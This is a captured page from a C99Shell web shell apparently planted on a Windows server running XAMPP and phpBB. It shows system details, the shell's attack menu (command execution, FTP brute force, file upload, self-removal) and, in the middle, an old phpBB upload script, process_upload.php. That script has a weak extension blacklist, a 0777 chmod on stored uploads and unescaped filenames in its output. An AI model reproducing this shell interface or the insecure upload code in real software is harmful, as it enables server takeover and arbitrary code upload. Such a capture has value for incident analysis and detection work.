!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\Intranet\C\xampp\htdocs\phpbb\   drwxrwxrwx
Free 4.1 GB of 39.52 GB (10.37%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     process_upload.php (2.5 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/***************************************************************************
                            process_upload.php -
                Processes uploaded files, included by
                reply.php and newtopic.php .
                             -------------------
    begin                : Thu May 03 2001
    copyright            : (C) 2001 by Steve Shimp
    email                : steve@forcefed4.com
 
 
 ***************************************************************************/

/***************************************************************************
 *                                                                                         
 *   This program is free software; you can redistribute it and/or modify      
 *   it under the terms of the GNU General Public License as published by  
 *   the Free Software Foundation; either version 2 of the License, or            
 *   (at your option) any later version.
 *
 ***************************************************************************/

/***
 *** PROCESS UPLOADED FILE
 ***/
    
$image_link 0// default to non-image link
    
$source $HTTP_POST_FILES['file1']['tmp_name'];
    
$source_mime $HTTP_POST_FILES['file1']['type'];
    
$origname $HTTP_POST_FILES['file1']['name'];
    
$upload_size $HTTP_POST_FILES['file1']['size'];
    
// don't allow anyone to be stupid
    
$filearray explode(".",$origname);
    
$fileext $filearray[count($filearray) - 1];
    
$badext "CGI PHP PL ASP";
    if(
$fileext != "") {    
        if(
strstr($badext,strtoupper($fileext)))
            
$origname .= ".txt";    
    }
    
$dest '';
    
$upload_type split("/",$source_mime);
    if( (
$source != 'none') && ($source != '')) {
        if( 
$upload_type[0] == "image" ) {
            
$image_link 1;
        }
        
$dest $url_uploads "/" $origname;

        if(
$upload_size $max_upload_size) {
            
unlink($source);
            
$message .= "<BR><SMALL>Uploaded file larger than $max_upload_size limit.  Sorry.</SMALL><BR>";
        } else {
            if(
move_uploaded_file($source,$dest)) {
                if(!
chmod($dest,0777)) {
                    echo 
'<BR>File mode could not be modified.<BR>';
                }
            } else {    
// file move success
                
echo '<BR>File could not be stored.<BR>';
            }

            
// now put link into original message
            
if($image_link == 1) {
                
$message .= "<BR><IMG SRC=\"".$dest."\"><BR>";
            } else {
                
$message .= "<BR><BR>Uploaded file: <A HREF=\"".$dest."\">$origname</A>";
            }
        } 
// end if on large file
    
// else no file selected or too large of a file
//*****************************************************************************

?>


:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0312 ]--